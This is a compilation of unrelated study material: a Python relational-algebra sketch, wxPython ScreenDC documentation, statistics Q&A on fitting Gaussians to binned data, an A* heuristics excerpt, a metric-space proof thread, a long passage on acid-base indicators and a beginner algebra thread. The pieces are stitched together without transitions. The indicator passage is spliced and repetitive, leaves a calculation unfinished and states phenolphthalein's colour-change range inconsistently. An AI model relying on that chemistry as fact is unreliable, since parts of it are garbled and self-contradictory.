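The subtract-the-non-maxima construction can be mimicked with Python sets of tuples standing in for relations (a toy sketch, not a database):

```python
# A toy relation of (Letter, Number) tuples.
rel = {("A", 1), ("B", 2), ("C", 3), ("D", 3)}

numbers = {n for (_, n) in rel}  # projection onto Number

# Theta-join of the relation with a renamed copy of itself on
# Number1 < Number2, then projection onto Number1: every value that
# is smaller than some other value, i.e. every non-maximum.
non_max = {n1 for n1 in numbers for n2 in numbers if n1 < n2}

maximum = numbers - non_max  # set difference leaves only the maximum
# maximum == {3}; flipping the comparison to n1 > n2 yields the minimum
```

The same three steps (rename, theta-join plus projection, set difference) are exactly the relational-algebra expression described above.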
# wx.ScreenDC¶
A wx.ScreenDC can be used to paint on the screen.
This should normally be constructed as a temporary stack object; don’t store a wx.ScreenDC object.
When using multiple monitors, wx.ScreenDC corresponds to the entire virtual screen composed of all of them. Notice that coordinates on wx.ScreenDC can be negative in this case, see wx.Display.GetGeometry for more.
## Class Hierarchy¶
Inheritance diagram for class ScreenDC:
## Methods Summary¶
__init__            Constructor.
EndDrawingOnTop     Use this in conjunction with StartDrawingOnTop.
StartDrawingOnTop   Use this in conjunction with EndDrawingOnTop to ensure that drawing to the screen occurs on top of existing windows.
## Class API¶
class wx.ScreenDC(DC)
Possible constructors:
ScreenDC()
A ScreenDC can be used to paint on the screen.
### Methods¶
__init__(self)
Constructor.
static EndDrawingOnTop()
Use this in conjunction with StartDrawingOnTop .
This function destroys the temporary window created to implement on-top drawing (X only).
Return type
bool
static StartDrawingOnTop(*args, **kw)
StartDrawingOnTop (window)
Use this in conjunction with EndDrawingOnTop to ensure that drawing to the screen occurs on top of existing windows.
Without this, some window systems (such as X) only allow drawing to take place underneath other windows.
This version of StartDrawingOnTop is used to specify that the area that will be drawn on coincides with the given window. It is recommended that an area of the screen is specified with StartDrawingOnTop because with large regions, flickering effects are noticeable when destroying the temporary transparent window used to implement this feature.
You might use this function when implementing a drag feature, for example as in the wx.SplitterWindow implementation.
Parameters
window (wx.Window) –
Return type
bool
Note
This function is probably obsolete since the X implementations allow drawing directly on the screen now. However, the fact that this function allows the screen to be refreshed afterwards, may be useful to some applications.
StartDrawingOnTop (rect=None)
Use this in conjunction with EndDrawingOnTop to ensure that drawing to the screen occurs on top of existing windows.
Without this, some window systems (such as X) only allow drawing to take place underneath other windows.
This version of StartDrawingOnTop is used to specify an area of the screen which is to be drawn on. If None is passed, the whole screen is available. It is recommended that an area of the screen is specified with this function rather than with StartDrawingOnTop , because with large regions, flickering effects are noticeable when destroying the temporary transparent window used to implement this feature.
You might use this function when implementing a drag feature, for example as in the wx.SplitterWindow implementation.
Parameters
rect (wx.Rect) –
Return type
bool
Note
This function is probably obsolete since the X implementations allow drawing directly on the screen now. However, the fact that this function allows the screen to be refreshed afterwards, may be useful to some applications.
# Fitting a Gaussian to a histogram when the bin size is significant
I'd like to fit a Gaussian to some experimental data that is binned (the binning is a result of the physical limits of the device). Importantly, the bin size is significant enough that the Gaussian cannot be considered flat in the bin window (see pic below). The data is actually 3D, but let's just consider the 1D example to start. How does one write a likelihood function for the goodness-of-fit?
My intuition is to simply consider each bin independently and compare the density versus the integrated Gaussian density in the bin window: \begin{align} p(D|\Theta) &= \prod_i^N p(d_i|\Theta) \\ &= \prod_i^N f\left(d_i - \int_{x_i}^{x_{i+1}}\phi(x|\mu,\sigma)dx\right) \end{align} where $N$ is the number of bins, $d_i$ is the bin height for bin $i$, $\phi(x|\mu,\sigma)$ is the Gaussian PDF, and the integral is over the bin width. My question is: what should I use for $f$? In other words, how is the agreement between $d_i$ and $\phi$ distributed?
• How does this likelihood function change for higher dimensions?
• The integration of a Gaussian over a finite bin size is pretty expensive to compute. Since again my problem is 3D, I'm going to have to do numerical integration MANY times for millions of bins. Is there a faster way to do it?
• Although you discuss goodness of fit, it sounds like what you really want to do is the fitting itself--that is, to estimate the 3D means and covariance matrices. Would this in fact be the case? – whuber Nov 14 '14 at 3:40
• Indeed the goal is to do the fitting. The reason I'm asking for help with the likelihood function is that my eventual goal is to incorporate priors, so everything needs to be probabilistic. If that makes any sense :) – cgreen Nov 14 '14 at 3:44
• Sure, it makes sense. I also think things might not be as bleak as you make out: you likely can get an excellent initial fit by sampling each bin at its center (and computing the density there), and then improve on that fit if you like by slightly intensifying that sampling, such as moving to $8$ points per bin, etc. This actually promises to be faster than if you had all the unbinned data. – whuber Nov 14 '14 at 3:47
• @Neil Yes, I'm sure. Remember, I'm talking about using an approximation to achieve an initial fit quickly and inexpensively and then "polishing" that fit based on the full and correct likelihood. Worked examples of how that polishing step would go are presented at stats.stackexchange.com/a/12491 and stats.stackexchange.com/a/68238. – whuber Nov 14 '14 at 16:24
• @Neil That is correct--but in finding the initial ML approximation it is an unnecessary complication, especially in more than one dimension (where the analog of Sheppard's corrections can be expected to be appropriate only for uncorrelated Gaussians). The idea here is to sneak up on a correct ML solution in two steps: the first step essentially ignores the binning, pretending all data are located either in the bin centers, randomly within their bins, or equally spaced within them; after initial estimates of the parameters are obtained, then a better calculation is performed. – whuber Nov 14 '14 at 17:43
If you know that $y_i \in [x_j, x_{j+1})$, where $x_j$'s are cut points from a bin, then you can treat this as interval censored data. In other words, for your case, you can define your likelihood function as
$\displaystyle \prod_{i = 1}^n (\Phi(r_i|\mu, \sigma) - \Phi(l_i|\mu, \sigma) )$
Where $l_i$ and $r_i$ are the lower and upper limits of the bin in which the exact value lies.
A note is that the log likelihood is not strictly concave for many of the models for interval censored data, but in practice this is not of much consequence.
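A minimal numeric sketch of this interval-censored likelihood, using only the standard library; the bin edges, counts, and parameter values below are made up for illustration:

```python
import math

def Phi(x, mu, sigma):
    # Gaussian CDF via the error function
    return 0.5 * (1.0 + math.erf((x - mu) / (sigma * math.sqrt(2.0))))

def log_lik(mu, sigma, edges, counts):
    # Each of the counts[i] observations in bin [edges[i], edges[i+1])
    # contributes log(Phi(r) - Phi(l)) to the log-likelihood.
    ll = 0.0
    for l, r, c in zip(edges[:-1], edges[1:], counts):
        p = Phi(r, mu, sigma) - Phi(l, mu, sigma)
        ll += c * math.log(max(p, 1e-300))
    return ll

edges = list(range(-5, 6))   # unit-width bins from -5 to 5
mu0, s0 = 0.3, 1.2           # "true" parameters for the toy data
# Idealized counts: 1000 observations spread exactly as the bins expect.
counts = [1000 * (Phi(r, mu0, s0) - Phi(l, mu0, s0))
          for l, r in zip(edges[:-1], edges[1:])]
```

With idealized counts like these, the likelihood is maximized at the generating parameters, which makes the function easy to sanity-check before plugging it into an optimizer or a posterior.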
You should treat each bin as if it were generating random points uniformly within its bounds. Therefore calculate a weighted average for each bin $(x_l, x_h]$ of $E(x) = \frac{x_h + x_l}{2}$ and $E(x^2) = \frac{x_h^2 + x_lx_h + x_l^2}{3}$. This weighted average determines a Gaussian.
You can incorporate a prior by treating this Gaussian as a likelihood.
• That's a little confusing, can you elaborate? I understand the idea of each bin generating uniform points, but what do you mean they determine a Gaussian? – cgreen Nov 14 '14 at 5:00
• The mean and second moment are one way to parametrize a Gaussian. You could have done mean and variance if you like. – Neil G Nov 14 '14 at 5:03
• Ah right of course. Then how do you compare these bin gaussians to the fitting function? – cgreen Nov 14 '14 at 5:05
• It is inconsistent to assume the distribution is Gaussian and is uniform within each bin. That inconsistency is going to cause more and more trouble as the dimension increases. – whuber Mar 1 '15 at 21:37
• @whuber: you're right. I guess this could be a starting point of an iterative approach. – Neil G Mar 1 '15 at 23:36
Given whuber's comment on my last answer, I suggest you use that answer to find a mean and variance $\mu, \sigma^2$ as a starting point. Then, calculate the log-likelihood $\ell$ of having observed the bin counts you got. Finally, optimize the mean and variance by gradient descent. It should be easy to calculate the gradients of the log-likelihood with respect to the parameters. This log-likelihood seems to me to be convex.
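As a sketch of the inexpensive initial step, here are the per-bin uniform moments from the earlier answer applied to toy binned counts (the counts are made up); the resulting mean and variance define a starting Gaussian that can then be polished against the full likelihood:

```python
import math

# Made-up counts for unit-width bins [l, l+1), l = -5..4.
edges = list(range(-5, 6))
counts = [0, 1, 9, 62, 219, 338, 261, 91, 17, 2]

n = sum(counts)
# Treat each bin as uniform on (l, r]:
#   E(x)   = (l + r) / 2
#   E(x^2) = (r^2 + r*l + l^2) / 3
m1 = sum(c * (l + r) / 2 for l, r, c in zip(edges[:-1], edges[1:], counts)) / n
m2 = sum(c * (r*r + r*l + l*l) / 3 for l, r, c in zip(edges[:-1], edges[1:], counts)) / n

mu_hat = m1
sigma_hat = math.sqrt(m2 - m1 * m1)
```

As whuber notes, the uniform-within-bin assumption is inconsistent with the Gaussian model, so this only supplies a starting point; the variance it produces is slightly inflated by the binning (compare Sheppard's correction of width²/12 for unit bins).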
# properties of heuristics and A*
Let $G=(V,E,c)$ be a directed graph with non-negative costs. Also consider a starting vertex $s$ and a goal vertex $g$. The classic search problem is to find an optimal cost path between $s$ and $g$. Consider the distance function $d:V \times V \to \mathbb R$ induced by the cost $c$ (the cost of the minimum cost path). Also, assume the graph $G$ is strongly connected, and let $w$ be a real number greater than or equal to 1.
A heuristic is a function $h:V \to \mathbb R$. A heuristic $h$ is $w$-admissible if $h(x) \leq w\,d(x,g)$ for all $x \in V$. A heuristic is $w$-consistent if $h(g) = 0$ and for all $x,y \in V$ such that $(x,y) \in E$ we have $h(x) \leq w\,c(x,y) + h(y)$. For $w = 1$ we just say…
View original post 1,851 more words
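The definitions in the excerpt transcribe directly into a checker. This sketch (all names hypothetical) tests w-consistency of a heuristic on a small directed graph:

```python
import math

def is_w_consistent(h, goal, edges, w=1.0):
    # h: dict mapping vertex -> heuristic value
    # edges: dict mapping (x, y) -> cost c(x, y)
    if not math.isclose(h[goal], 0.0, abs_tol=1e-12):
        return False
    return all(h[x] <= w * c + h[y] for (x, y), c in edges.items())

# Tiny example graph: s -> a -> g with unit costs.
edges = {("s", "a"): 1.0, ("a", "g"): 1.0}
h_exact = {"s": 2.0, "a": 1.0, "g": 0.0}      # true distances to g
h_inflated = {"s": 3.5, "a": 1.0, "g": 0.0}   # overestimates at s

# h_exact is 1-consistent; h_inflated violates w = 1 but satisfies w = 2.5.
```

A w-admissibility check would be analogous, comparing h(x) against w times the true distance d(x, g) for every vertex.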
## About Khuram Ali
Programming... Programming and Programming...!!!
Posted on April 27, 2013, in Algorithms, Artificial Intelligence. Bookmark the permalink. 4 Comments.
# Homework Help: Show a function is uniformly continuous
1. May 11, 2009
### aeronautical
Let F be a non-empty subset of a metric space (X,d) and define the function f: X→R by f(x) = inf_{y∈F} d(x,y) = inf {d(x,y) : y ∈ F}. Please show that f is uniformly continuous on all of X.
Please note that f(x) = inf_{y∈F} d(x,y) means that y∈F is written below the inf; it is hard to show that on one line, so I chose to write it as a subscript. Can anyone tell me how I should begin this problem?
2. May 11, 2009
### quasar987
Strange coincidence, I've been trying to solve the same problem! Well, not exactly the same... I have been trying to show that the map $x\mapsto d(x, F)$ is Lipschitz continuous, meaning that there exists a constant C such that |d(x,F)-d(y,F)|≤Cd(x,y) for all x,y in X. Obviously Lipschitz continuity is stronger than uniform continuity since given ε>0, it suffices to take δ=ε/C. As it turns out, there is an exercise in the book Topology and Geometry of G. Bredon that asks the reader to show that the map $x\mapsto d(x, F)$ is (merely!) continuous. And a hint is provided in suggesting to show that this map is actually Lipschitz of constant C=1. Meaning that, somewhat surprisingly, the easiest way to solve your problem and mine is probably to demonstrate the stronger inequality |d(x,F)-d(y,F)|≤d(x,y) for all x,y in X. So let's try to show this.
3. May 11, 2009
### quasar987
The key for me was to consider first the very special case in which F consists of only two points: F={p,q}. In this scenario, the problem is not so overwhelming psychologically and after solving it, I realized that its solutions admits an immediate generalization to the case of arbitrary F.
The general solution I found is as follows. Tell me what you think.
First, note that we can assume without loss of generality that d(y,F)≤d(x,F) [if not, interchange the labels of x and y...]. In this case, |d(x,F)-d(y,F)|=d(x,F)-d(y,F) and so we must prove that d(x,F)≤d(x,y)+d(y,F) [i.e., we must prove a kind of triangle inequality in which sets are allowed to occupy one of the variable position].
Next, consider a sequence {f_n} of points in F such that d(y,F) = lim d(y,f_n). By the definition of the infimum, we also have d(x,F) ≤ d(x,f_n) for every n in N.
Then d(x,F) ≤ d(x,f_n) ≤ d(x,y) + d(y,f_n) for all n in N, and passing to the limit yields d(x,F) ≤ d(x,y) + d(y,F), which is the desired conclusion.
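Not a substitute for the proof, but the 1-Lipschitz inequality is easy to sanity-check numerically. A minimal Python sketch (the finite set F, the sample points, and the Euclidean metric on the plane are arbitrary illustrative choices, not part of the problem):

```python
import random
import math

def dist_to_set(x, F):
    """d(x, F) = inf over y in F of d(x, y), for a finite set F in the plane."""
    return min(math.dist(x, y) for y in F)

random.seed(0)
F = [(random.uniform(-5, 5), random.uniform(-5, 5)) for _ in range(20)]

# Check |d(x,F) - d(y,F)| <= d(x,y) on many random pairs of points.
for _ in range(1000):
    x = (random.uniform(-10, 10), random.uniform(-10, 10))
    y = (random.uniform(-10, 10), random.uniform(-10, 10))
    assert abs(dist_to_set(x, F) - dist_to_set(y, F)) <= math.dist(x, y) + 1e-12
print("1-Lipschitz inequality held on all sampled pairs")
```

Of course, 1000 random pairs prove nothing; the argument above is what proves it for every pair.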
# Indicators for weak acid and strong base titrations
What is an indicator? An acid-base indicator is a weak acid or a weak base whose two conjugate forms have distinctly different colours, so that the colour of a solution signals its pH. Indicators do not change colour sharply at a single pH; instead, they change over a narrow range of pH. Some indicators (such as thymol blue) are polyprotic acids or bases, which change color twice at widely separated pH values. Writing a simple indicator acid as HLit (for litmus), the equilibrium position shifts towards the weak acid in acidic conditions and towards the conjugate base Lit⁻ in basic conditions, changing colour as it does so; at some point during the movement of the position of equilibrium, the concentrations of the two colours become equal and the mixture shows its intermediate colour. The relationship between pH and the ratio of the two forms is the Henderson-Hasselbalch equation. For methyl orange, we can rearrange the equation for Ka and write:

$\mathrm{\dfrac{[In^-]}{[HIn]}=\dfrac{[substance\: with\: yellow\: color]}{[substance\: with\: red\: color]}=\dfrac{\mathit{K}_a}{[H_3O^+]}}$

The endpoint of a titration is usually detected by adding an indicator, and the colour change must be easily detected. The point at which an indicator changes colours is different for each chemical, so the indicator must be matched to the titration: a good indicator should have a pKin value that is close to the expected pH at the equivalence point. Figure $$\PageIndex{2}$$ shows the approximate pH range over which some common indicators change color and their change in color. In the titration of a weak acid with a strong base, for example, the conjugate base of the weak acid makes the pH at the equivalence point greater than 7, and in this condition only the phenolphthalein indicator works well. To see how sharp the endpoint is, note that when 24.95 ml of strong base have been added to 25.00 ml of strong acid of equal concentration, the concentration of the remaining hydrogen ion is [H+] = (0.05 x 10-3)/0.04995 = …

A quick exercise: for a titration whose equivalence point lies near pH 8, which indicator is best? A) bromothymol blue, pKa = 7.0; B) indigo carmine, pKa = 13.8; C) cresol red, pKa = 8.0; D) methyl red, pKa = 5.1. The correct answer is C, the indicator whose pKa lies closest to the equivalence-point pH. Buffer components are chosen the same way: MES, an abbreviation for 2-(N-morpholino)ethanesulfonic acid, is a weak acid with pKa = 6.27, dissociating as AH + H2O ⇌ A⁻(aq) + H3O⁺(aq). (Parts of this material are textbook content by Paul Flowers (University of North Carolina - Pembroke), Klaus Theopold (University of Delaware) and Richard Langley (Stephen F. Austin State University) with contributing authors.)
Acids and bases vary in their strength and are normally classified as strong or weak. Bronsted-Lowry theory defines an acid as a substance that can donate a proton and a base as a substance that can accept a proton; a weak acid or a weak base only partially dissociates, so an equilibrium is established when it dissolves in water. A weak base reacts as B + H2O ⇌ BH⁺(aq) + OH⁻(aq). Acid-base indicators are themselves weak organic acids or weak organic bases, which when dissolved in water dissociate slightly and form ions. Litmus is a weak acid with a seriously complicated molecule, which we simplify to HLit; the "H" is the proton which can be given away to something else. The un-ionised litmus is red, whereas the ion is blue: adding hydroxide ions removes hydrogen ions from the equilibrium, which tips to the right to replace them, turning the solution blue (in phenolphthalein, the same shift turns the indicator pink). Naturally occurring indicators behave the same way: red cabbage juice contains a mixture of colored substances that change from deep red at low pH to light blue at intermediate pH to yellow at high pH (Figure $$\PageIndex{1}$$). Universal indicator comes with a colour-matching chart, which can be used to determine the approximate pH value of a solution, although without the chart it could not distinguish between, say, a weak acid at pH 5 and a strong alkali at pH 14.

It is possible to calculate the pH of the solution at each stage when a weak acid is titrated with a strong base:

⚛ Before any strong base is added to the weak acid: [H⁺(aq)] ≈ √(Ka [weak acid]), and pH = −log10 [H⁺(aq)].

⚛ While the weak acid is in excess: set up a R.I.C.E. table (Reaction, Initial, Change, Equilibrium) for the neutralisation and treat the resulting mixture as a buffer. The neutralisation itself is the reverse of the Kb reaction for the conjugate base A⁻, so its equilibrium constant, K = 1/Kb = 1/(Kw/Ka (for HA)) = 5.4 × 10⁷ in the example considered, is large enough that the reaction goes essentially to completion.

The buffer relationship follows from rearranging the expression describing the indicator (or acid) equilibrium:

$\mathrm{\dfrac{[H_3O^+]}{\mathit{K}_a}=\dfrac{[HIn]}{[In^- ]}}$

$\mathrm{log\left(\dfrac{[H_3O^+]}{\mathit{K}_a}\right)=log\left(\dfrac{[HIn]}{[In^- ]}\right)}$

$\mathrm{log([H_3O^+])-log(\mathit{K}_a)=-log\left(\dfrac{[In^-]}{[HIn]}\right)}$

$\mathrm{-pH+p\mathit{K}_a=-log\left(\dfrac{[In^-]}{[HIn]}\right)}$

$\mathrm{pH=p\mathit{K}_a+log\left(\dfrac{[In^-]}{[HIn]}\right)\:or\:pH=p\mathit{K}_a+log\left(\dfrac{[base]}{[acid]}\right)}$

The last formula is the Henderson-Hasselbalch equation. Think of what happens half-way through an indicator's colour change: the concentrations of the two coloured forms are equal, the logarithmic term vanishes, and pH = pKind, so you can use this to work out the pH at the half-way point of any indicator's colour change.

Which indicator to choose depends on the titration. (i) Strong acid vs strong base: phenolphthalein (pH range 8.3 to 10.5), methyl red (pH range 4.4 to 6.5) and methyl orange (pH range 3.2 to 4.5) all work, because the titration curve is so steep at the equivalence point that there will be virtually no difference in the volume added whichever indicator you choose. (ii) Weak acid vs strong base: phenolphthalein, which changes in a range of about 8 to 10, works really well; using the wrong indicator for a titration of a weak acid or a weak base can result in relatively large errors, as illustrated in Figure $$\PageIndex{3}$$. In every case it makes sense to titrate to the best possible colour with each indicator: with methyl orange you titrate until there is the very first trace of orange in the solution (if the solution becomes red, you have gone past the endpoint), and with phenolphthalein you titrate until it just becomes colourless, at pH 8.3. For scale, 1 drop from a burette is about 0.05 ml. A solution of a weak acid cannot be titrated with a weak base using an indicator to find the end-point, because the pH change is too gradual close to the equivalence point. A titration curve also reflects the strength of the corresponding acid and base, and can be used to read off the pKa of an unknown acid or the pKb of an unknown base. (Textbook content produced by OpenStax College is licensed under a Creative Commons Attribution License 4.0 license.)
A worked example: calculate the pH for the weak acid/strong base titration between 50.0 mL of 0.100 M HCOOH(aq) (formic acid) and 0.200 M NaOH (titrant) at the listed volumes of added base: 0.00 mL, 15.0 mL, 25.0 mL, and 30.0 mL.
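The four volumes fall into the four standard regimes: pure weak acid, buffer region, equivalence point, and excess strong base. A minimal Python sketch of the calculation, assuming Ka = 1.8 × 10⁻⁴ for formic acid (a standard literature value, not given in the text) and the simple square-root approximations used in introductory treatments:

```python
import math

KA = 1.8e-4   # assumed literature Ka for formic acid (HCOOH)
KW = 1.0e-14  # ion product of water at 25 °C

def titration_ph(v_base_ml, c_acid=0.100, v_acid_ml=50.0, c_base=0.200):
    """pH of a weak acid titrated with a strong base, by regime."""
    n_acid = c_acid * v_acid_ml / 1000.0      # mol HA initially present
    n_base = c_base * v_base_ml / 1000.0      # mol OH- added
    v_tot = (v_acid_ml + v_base_ml) / 1000.0  # total volume, L

    if n_base == 0:                            # pure weak acid: [H+] ~ sqrt(Ka*C)
        h = math.sqrt(KA * n_acid / v_tot)
        return -math.log10(h)
    if n_base < n_acid:                        # buffer: Henderson-Hasselbalch
        return -math.log10(KA) + math.log10(n_base / (n_acid - n_base))
    if math.isclose(n_base, n_acid):           # equivalence: conjugate base only
        kb = KW / KA
        oh = math.sqrt(kb * n_acid / v_tot)
        return 14.0 + math.log10(oh)
    oh = (n_base - n_acid) / v_tot             # past equivalence: excess OH-
    return 14.0 + math.log10(oh)

for v in (0.0, 15.0, 25.0, 30.0):
    print(f"{v:5.1f} mL NaOH -> pH {titration_ph(v):.2f}")
```

With these assumptions the four volumes give pH ≈ 2.37, 3.92, 8.28 and 12.10, illustrating why an indicator changing colour in the basic range is needed at the equivalence point.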
During the titration of a strong acid with a strong base, the pH near the equivalence point changes very rapidly, sweeping from about 3 to 11, which is why phenolphthalein, whose working range runs from pH 8 to 10, is the indicator most often used for this type of titration. Phenolphthalein is itself a weak acid: colourless in acid and bright pink in alkali, it distinguishes the pH range from about 8 to 9.6, and the half-way stage of its colour change happens at pH 9.3. An acid-base indicator, then, is simply a weak acid or weak base that exhibits a colour change as the concentration of hydrogen (H+) or hydroxide (OH-) ions changes in aqueous solution; its behaviour is completely analogous to the action of buffers. Two practical requirements follow: the indicator molecule must not react with the substance being titrated, and its colour change must sit at the right pH. Synthetic indicators have been developed that meet these criteria and cover virtually the entire pH range.

Consider plots of pH versus volume of base added for the titration of 50.0 mL of a 0.100 M solution of a strong acid (HCl) and of a weak acid (acetic acid) with 0.100 M NaOH, with the pH ranges of two common indicators superimposed (methyl red, pKin = 5.0; phenolphthalein, pKin = 9.5). Either indicator exhibits a reasonably sharp colour change at the equivalence point of the strong acid titration, but only phenolphthalein is suitable for the weak acid titration: methyl red begins to change from red to yellow around pH 5, which is near the midpoint of the acetic acid titration, not the equivalence point, so adding only about 25-30 mL of NaOH would already change its colour, resulting in a huge error.

You obviously need to choose an indicator which changes colour as close as possible to the equivalence point. In a two-stage reaction such as sodium carbonate with dilute hydrochloric acid, phenolphthalein changes colour at exactly the pH of the first equivalence point and methyl orange at the second, so both give valid titration results, but the value obtained with phenolphthalein is exactly half the methyl orange one.

The equilibrium in a solution of the acid-base indicator methyl orange, a weak acid, can be represented by an equation in which we use HIn as a simple representation for the complex methyl orange molecule:

$\underbrace{\ce{HIn}_{(aq)}}_{\ce{red}}+\ce{H2O}_{(l)}⇌\ce{H3O+}_{(aq)}+\underbrace{\ce{In-}_{(aq)}}_{\ce{yellow}}$

$K_\ce{a}=\ce{\dfrac{[H3O+][In- ]}{[HIn]}}=4.0×10^{−4}$

If most of the indicator (typically about 60-90% or more) is present as In⁻, we see the colour of the In⁻ ion, which is yellow for methyl orange; the nonionized form HIn is red. Conversely, for the titration of a weak base, where the pH at the equivalence point is less than 7.0, an indicator such as methyl red or bromocresol blue, with pKin < 7.0, should be used; for a weak acid titrated with a weak base, no suitable indicator can be used at all, because the pH changes too gradually near the equivalence point. The existence of many different indicators with different colours and pKin values also provides a convenient way to estimate the pH of a solution without using an expensive electronic pH meter and a fragile pH electrode.
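The ratio of the two coloured forms at any pH follows directly from the Ka expression above. A short Python sketch using the methyl orange value Ka = 4.0 × 10⁻⁴ quoted in the text (the function name is my own, for illustration):

```python
import math

KA_METHYL_ORANGE = 4.0e-4  # Ka for methyl orange, as quoted in the text

def base_to_acid_ratio(ph, ka=KA_METHYL_ORANGE):
    """[In-]/[HIn] = Ka / [H3O+]: the yellow-to-red ratio for methyl orange."""
    return ka / 10.0 ** (-ph)

# At pH = pKa the two forms are present in equal amounts (ratio 1):
pka = -math.log10(KA_METHYL_ORANGE)
print(f"pKa = {pka:.2f}, ratio there = {base_to_acid_ratio(pka):.2f}")

# One pH unit above pKa the yellow form outnumbers the red 10 to 1:
print(f"ratio at pH {pka + 1:.2f} = {base_to_acid_ratio(pka + 1):.1f}")
```

This is the quantitative content of the colour-change range: within roughly one pH unit either side of pKa, both forms are visibly present, and outside it one form dominates.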
To summarise the choice of indicator: (i) strong acid vs strong base: phenolphthalein, methyl red or methyl orange all work; (ii) weak acid vs strong base: phenolphthalein only; (iii) strong acid vs weak base: methyl red or methyl orange (bromothymol blue can also be used); (iv) weak acid vs weak base: no suitable indicator can be used for such a titration, because the pH change is a gradual smooth change from one colour to the other rather than a sharp step.

A few remaining details. Neutral litmus paper is purple; it turns red in the presence of an acid and blue in the presence of a base, so blue litmus paper turns red in acid and red litmus paper turns blue in base. Methyl orange turns red in acidic solution and yellow otherwise, its colour change beginning around [H3O+] = 8 × 10−4 M (a pH of 3.1). As a setting for indicator choice with a weak acid, consider the titration of 50.00 mL of 0.02000 M MES with 0.1000 M NaOH: the equivalence point lies above pH 7, so an indicator with a basic-range pKin is required. In every case, the indicator should have a pKin close to the pH expected at the equivalence point, and its colour change must be visible for the endpoint to be detected.

© Jim Clark 2002 (last modified November 2013)
# Math Help - Simplifying Expressions
1. ## Simplifying Expressions
Hi Folks,
Wondering you guys can show me and help me simplify this expression.
$(x+1)^2 - (x-1)^2$
2. ## Re: Simplifying Expressions
Are you aware of the difference of two squares, and how it applies here?
This states that:
$a^2-b^2=(a+b)(a-b)$
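For reference, applying this identity to the expression in the opening post (with a = x+1 and b = x−1) collapses the whole problem into one line:

```latex
(x+1)^2-(x-1)^2=\big[(x+1)+(x-1)\big]\big[(x+1)-(x-1)\big]=(2x)(2)=4x
```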
3. ## Re: Simplifying Expressions
Originally Posted by Quacky
Are you aware of the difference of two squares, and how it applies here?
This states that:
$a^2-b^2=(a+b)(a-b)$
I am not. I only learnt how to expand expressions yesterday with the foil method, so my knowledge is very basic.
4. ## Re: Simplifying Expressions
Originally Posted by richtea9
I am not. I only learnt how to expand expressions yesterday with the foil method, so my knowledge is very basic.
In that case, take note that (a + b)^2 = (a + b)(a + b)
Use FOIL to expand each of the squares, then collect like terms.
5. ## Re: Simplifying Expressions
Ok. Well then let's not run before we can walk. What did you get when you tried to expand? We have:
$(x+1)(x+1)-(x-1)(x-1)$
Use the FOIL method twice.
Edit: Prove It's elite typing skills squash me again!
6. ## Re: Simplifying Expressions
Originally Posted by Quacky
Ok. Well then let's not run before we can walk. What did you get when you tried to expand? We have:
$(x+1)(x+1)-(x-1)(x-1)$
Use the FOIL method twice.
Edit: Prove It's elite typing skills squash me again!
Ok, this is what I got using the foil method.
$(x^2 + 2x +1) - (x^2 - 2x - 1)$
Not sure though if its correct.
7. ## Re: Simplifying Expressions
Nearly. It should be:
$(x^2+2x+1)-(x^2-2x+1)$ because $-1\times{-1}=1$
Can you see how to simplify further? You need to group like terms - but be wary of that negative sign!
8. ## Re: Simplifying Expressions
Originally Posted by Quacky
Nearly. It should be:
$(x^2+2x+1)-(x^2-2x+1)$ because $-1\times{-1}=1$
Can you see how to simplify further? You need to group like terms - but be wary of that negative sign!
Sorry, I cannot see how to simplify further.
Is it something to do with the $x^2 + 2x$ and $x^2 - 2x$
Thanks for the help so far btw.
9. ## Re: Simplifying Expressions
That's fine .
We have $x^2+2x+1-(x^2-2x+1)$
I am going to start by getting rid of the brackets on the right by multiplying through by the negative. This will give:
$x^2+2x+1-x^2+2x-1$
Take a moment to make sure you digest that - look at each of the signs.
As addition is commutative, we can rewrite this as:
$x^2-x^2+2x+2x+1-1$
Can you see anything here?
10. ## Re: Simplifying Expressions
Originally Posted by Quacky
That's fine .
We have $x^2+2x+1-(x^2-2x+1)$
I am going to start by getting rid of the brackets on the right by multiplying through by the negative. This will give:
$x^2+2x+1-x^2+2x-1$
Take a moment to make sure you digest that - look at each of the signs.
As addition is commutative, we can rewrite this as:
$x^2-x^2+2x+2x+1-1$
Can you see anything here?
I'm unsure what has happened to the brackets in the first expression you provided, and what do you mean by 'multiplying through by the negative'?
Looking at the last expression you provided, this is how I see it, but it's probably completely wrong.
$x^2 - x^2$ cancels each other out, so can we remove these?
$2x + 2x$ would that become $4x$
and finally, as 1 - 1 is = 0, we remove these? Leaving just $4x$
11. ## Re: Simplifying Expressions
Originally Posted by richtea9
I'm unsure what has happened to the brackets in the first expression you provided, and what do you mean by 'multiplying through by the negative'?
Looking at the last expression you provided, this is how I see it, but it's probably completely wrong.
$x^2 - x^2$ cancels each other out, so can we remove these?
$2x + 2x$ would that become $4x$
and finally, as 1 - 1 is = 0, we remove these? Leaving just $4x$
$4x$ is right, and you can't simplify it any further.
To clarify, we had:
$x^2+2x+1{\color{red}-}(x^2-2x+1)$
This means " $x^2+2x+1$ minus every individual term in the brackets"
So we can distribute the $-$ sign to every individual term in the brackets. It's exactly the same as multiplying through by $-1$, which is why I imprecisely said "multiply through by the negative". Basically, you just need to change all of the signs in the function one by one.
$=x^2+2x+1{\color{red}-}x^2{\color{red}-}(-2x){\color{red}-}(+1)$
$=x^2+2x+1-x^2+2x-1$
Which I then rearranged to help simplify further.
12. ## Re: Simplifying Expressions
Originally Posted by Quacky
$4x$ is right, and you can't simplify it any further.
To clarify, we had:
$x^2+2x+1{\color{red}-}(x^2-2x+1)$
This means " $x^2+2x+1$ minus every individual term in the brackets"
So we can distribute the $-$ sign to every individual term in the brackets. It's exactly the same as multiplying through by $-1$, which is why I imprecisely said "multiply through by the negative". Basically, you just need to change all of the signs in the function one by one.
$=x^2+2x+1{\color{red}-}x^2{\color{red}-}(-2x){\color{red}-}(+1)$
$=x^2+2x+1-x^2+2x-1$
Which I then rearranged to help simplify further.
Thanks again,
However I'm still confused by all of it.
I understand up until the point where you minus every individual term in the brackets.
Where have the brackets around the -2x come from?
13. ## Re: Simplifying Expressions
Originally Posted by richtea9
Thanks again,
However I'm still confused by all of it.
I understand up until the point where you minus every individual term in the brackets.
Where have the brackets around the -2x come from?
Those brackets were unnecessary - I just put them there to clarify. $--2x$ is ambiguous.
I've been trying to think of another way to explain it without success. I think, honestly, you need someone else to provide a different perspective here.
Consider $-(6+4)$
We can either say that this is $-(10)$ by doing the addition inside the brackets first
Or we can say that this is $-6-4=-10$.
Both are perfectly valid and get the correct solution. As long as you perform the same operation to everything within the bracket, your result will be the right one.
Consider $2(x+4)$
This means ' $2$ multiplied by everything in the bracket'.
Therefore, we could write it as $2x+8$
Consider $\frac{(3x+6)}{3}$
